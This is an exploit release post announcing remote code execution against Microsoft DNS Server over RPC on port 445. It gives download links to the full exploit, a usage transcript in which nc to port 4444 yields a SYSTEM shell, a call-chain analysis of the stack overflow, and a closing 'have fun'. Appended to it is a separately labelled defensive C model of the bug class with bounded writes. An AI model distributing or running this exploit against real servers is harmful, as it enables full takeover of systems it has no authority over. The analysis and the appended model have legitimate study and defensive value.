Hi, I'm sending you the headers of the new exploit code for Microsoft DNS servers. You can download the full source code exploit and analysis at:

- http://www.514.es/Microsoft_Dns_Server_Exploit.zip
- http://www.48bits.com/exploits/dnsxpl.rar

/*
 Microsoft DNS Server Remote Code execution Exploit and analysis

 Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx

 This remote exploit works against port 445 (also Microsoft RPC api used)

 Author:
   * Mario Ballano ( mballano~gmail.com )
   * Andres Tarasco ( atarasco~gmail.com )

 Timeline:
   * April,12,2007: Microsoft advisory published
   * April,13,2007: POC Exploit coded
   * April,14,2007: Microsoft notified about a new attack vector against port 445 (this exploit code)
   * April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
   * April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS bypassed
   * April,16,2007: hackers hax the w0rld and got busted.
   * April,xx,2007: Lammer release the first buggy worm
   * Xxxxx,xx,2007: Finally it was true. Naked photos of Gary m.. being abducted were found at NSA servers

 Usage:

 D:\DNSTEST>dnstest.exe 192.168.1.7
 -------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code (port 445)
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
 -------------------------------------------------------
 [+] Trying to fingerprint target.. 05 02
 [+] Remote Host identified as Windows 2003
 [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver]
 [+] RpcBindingFromStringBinding returned 0x0
 [+] Calling remote procedure DnssrvOperation()
 [+] Now try to connect to port 4444

 D:\DNSTEST>nc 192.168.1.7 4444
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.

 C:\WINDOWS\system32>whoami
 nt authority\system

 Vulnerability Analysis:

 The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer to convert a string calling Name_ConvertFileNameToCountName(); this string can contain back-slash octal characters. Although some bounds checks are done when writing to the buffer, it is still possible to bypass them using a string with multiple backslashed chars, resulting in a stack based buffer overflow.

 This function can be reached through the DNS RPC Interface; the execution flow will be as follows:

 R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);                    // RPC Exported function
   R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
     RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
       Zone_FindZoneByName(buggybuffer);                               // Here we go!
         Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
           Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); // Using fixed size local buffer
             extractQuotedChar(x,x,buggybuffer);                       // Extract octal number

 Disassemblies at the end of the code.

 References:
 - Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
 - www.48bits.com
 - http://www.514.es

 Just compile the code with nmake and have fun!
*/
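As an added illustration of the bug class in the analysis above (this is not code from the exploit archive and not Microsoft's implementation), the following hypothetical model converts a dotted name with backslash escapes into DNS count-name form inside a fixed-size buffer; the point it demonstrates is that a "\DDD" escape turns four input characters into one output byte, so the only safe bound is one applied to the output index on every single write. The function names, the 16-byte buffer size and the sample names are assumptions for the example.

```c
#include <stddef.h>
#include <stdint.h>
/* Hypothetical model (not Microsoft's code): convert a dotted name with
 * backslash escapes into DNS "count name" form (<len><label>...<0>) in a
 * fixed-size buffer. Returns bytes written, or -1 on malformed input or
 * when the result would not fit in out_cap. Trailing dots are rejected. */
static int is_oct(char c) { return c >= '0' && c <= '7'; }
int convert_to_count_name(const char *in, uint8_t *out, size_t out_cap)
{
    size_t o = 1, label_len_at = 0, i = 0; /* out[0]: first label's length */
    if (out_cap < 2) return -1;            /* need a length byte + terminator */
    while (in[i] != '\0') {
        uint8_t c; int escaped = (in[i] == '\\');
        if (escaped) {
            if (is_oct(in[i+1]) && is_oct(in[i+2]) && is_oct(in[i+3])) {
                /* "\DDD": four input chars collapse to ONE output byte */
                int v = (in[i+1]-'0')*64 + (in[i+2]-'0')*8 + (in[i+3]-'0');
                if (v > 255) return -1;
                c = (uint8_t)v; i += 4;
            } else if (in[i+1] != '\0') {
                c = (uint8_t)in[i+1]; i += 2;     /* "\c": literal c */
            } else return -1;                     /* dangling backslash */
        } else {
            c = (uint8_t)in[i]; i += 1;
        }
        /* Bound every write on the output index (one slot kept for the
         * terminator), never on how many input characters were consumed. */
        if (o >= out_cap - 1) return -1;
        if (!escaped && c == '.') {
            if (o == label_len_at + 1) return -1;    /* empty label */
            out[label_len_at] = (uint8_t)(o - label_len_at - 1);
            label_len_at = o++;                      /* reserve next length byte */
        } else {
            if (o - label_len_at - 1 >= 63) return -1;  /* RFC 1035 label max */
            out[o++] = c;
        }
    }
    if (o == label_len_at + 1) return -1;  /* empty name or trailing dot */
    out[label_len_at] = (uint8_t)(o - label_len_at - 1);
    out[o++] = 0;                          /* root terminator */
    return (int)o;
}
/* Demo helpers: a 16-byte buffer stands in for the fixed local buffer. */
int count_name_len(const char *in)
{ uint8_t b[16]; return convert_to_count_name(in, b, sizeof b); }
int count_name_byte(const char *in, size_t idx)
{ uint8_t b[16]; int n = convert_to_count_name(in, b, sizeof b);
  return (n < 0 || idx >= (size_t)n) ? -1 : b[idx]; }
```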